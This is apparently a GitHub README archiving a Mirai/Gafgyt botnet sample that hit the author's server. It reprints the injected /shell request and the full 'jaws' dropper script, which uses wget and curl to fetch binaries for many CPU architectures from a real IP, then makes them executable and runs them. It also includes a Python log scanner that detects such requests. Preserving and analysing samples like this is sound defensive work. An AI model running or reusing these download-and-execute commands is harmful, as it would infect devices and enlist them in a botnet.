altilunium / jaws.exploit

trojan.mirai/gafgyt sample

jaws.exploit

What?

So, once upon a time, my server was visited by 91.92.244.94, which sent this HTTP request.

GET /shell?cd+/tmp;rm+-rf+*;wget+193.233.203.76/jaws;sh+/tmp/jaws HTTP/1.1

Once URL-decoded (each "+" is an encoded space), the query string is a chain of four shell commands: change to /tmp, remove everything there, download 193.233.203.76/jaws with wget, then run it with "sh /tmp/jaws". It only does anything on a device whose /shell endpoint hands the query string to a shell.
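As an added example (not part of this repository), here is a small detector that reads web-server access-log lines, URL-decodes the request target the same way the device would, and flags the /shell download-and-run chain. The log lines are constructed for the example; the first reproduces the request reported above, the other two are benign requests that must not be flagged (the third even contains "wget" in a harmless search query).

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines in Apache/nginx "combined" format. The first
# mirrors the request the README reports; the other two are benign traffic
# added to show what the check must not flag.
SAMPLE_LOG = """\
91.92.244.94 - - [01/Jan/2024:00:00:00 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+193.233.203.76/jaws;sh+/tmp/jaws HTTP/1.1" 404 162 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:00:00:01 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
10.0.0.6 - - [01/Jan/2024:00:00:02 +0000] "GET /search?q=wget+manual HTTP/1.1" 200 512 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Tools a dropper chain uses to fetch and then run a payload.
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
INTERPRETERS = {"sh", "bash"}


def classify(target: str):
    """Decode a request target and return (commands, reasons).

    '+' in a query string is a URL-encoded space, so unquote_plus turns
    "cd+/tmp;rm+-rf+*" back into "cd /tmp;rm -rf *" before inspection.
    """
    parts = urlsplit(target)
    decoded = unquote_plus(parts.query)
    commands = [c.strip() for c in decoded.split(";") if c.strip()]
    first_words = {c.split()[0] for c in commands}
    reasons = []
    if parts.path == "/shell":
        reasons.append("request to /shell command-injection endpoint")
    if len(commands) > 1 and first_words & DOWNLOADERS:
        reasons.append("chained commands include a downloader")
    if len(commands) > 1 and first_words & INTERPRETERS:
        reasons.append("chained commands execute a fetched file")
    return commands, reasons


def scan_log(text: str):
    """Return one hit per suspicious request, with the decoded command chain."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        commands, reasons = classify(m.group("target"))
        if reasons:
            hits.append({
                "ip": m.group("ip"),
                "timestamp": m.group("ts"),
                "target": m.group("target"),
                "commands": commands,
                "reasons": reasons,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['timestamp']}")
        for cmd in hit["commands"]:
            print("   ", cmd)
        print("   reasons:", "; ".join(hit["reasons"]))
```

The path check catches this particular endpoint; the two command-chain checks are what make the rule useful against the same payload delivered through a different injection point, while the benign "wget manual" query shows why a bare keyword match is not enough.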

Here is the content of the jaws file.

#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86; cat db0fa4b8db0333367e9bda3ab68b8042.x86 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; cat db0fa4b8db0333367e9bda3ab68b8042.mips > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl; cat db0fa4b8db0333367e9bda3ab68b8042.mpsl > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm; cat db0fa4b8db0333367e9bda3ab68b8042.arm > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5; cat db0fa4b8db0333367e9bda3ab68b8042.arm5 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6; cat db0fa4b8db0333367e9bda3ab68b8042.arm6 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7; cat db0fa4b8db0333367e9bda3ab68b8042.arm7 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc; cat db0fa4b8db0333367e9bda3ab68b8042.ppc > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k; cat db0fa4b8db0333367e9bda3ab68b8042.m68k > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc; cat db0fa4b8db0333367e9bda3ab68b8042.spc > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686; cat db0fa4b8db0333367e9bda3ab68b8042.i686 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4; cat db0fa4b8db0333367e9bda3ab68b8042.sh4 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc; cat db0fa4b8db0333367e9bda3ab68b8042.arc > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit

Each line changes to the first directory it can enter (/tmp, then /var/run, /mnt, /root, finally /), downloads the payload for one CPU architecture (x86, mips, mpsl, arm, arm5, arm6, arm7, ppc, m68k, spc, i686, sh4, arc) with wget and again with curl, copies it to a file named 76d32be0, marks everything in the directory executable, and runs it with the argument "jaws.exploit". Only the binary built for the victim's CPU will actually execute; the others fail at exec, which is why the dropper simply tries every architecture in turn.

For archival purposes, I already downloaded all those executables here.

So?

I wish some security researchers could find out what these executables actually do.

Epilogue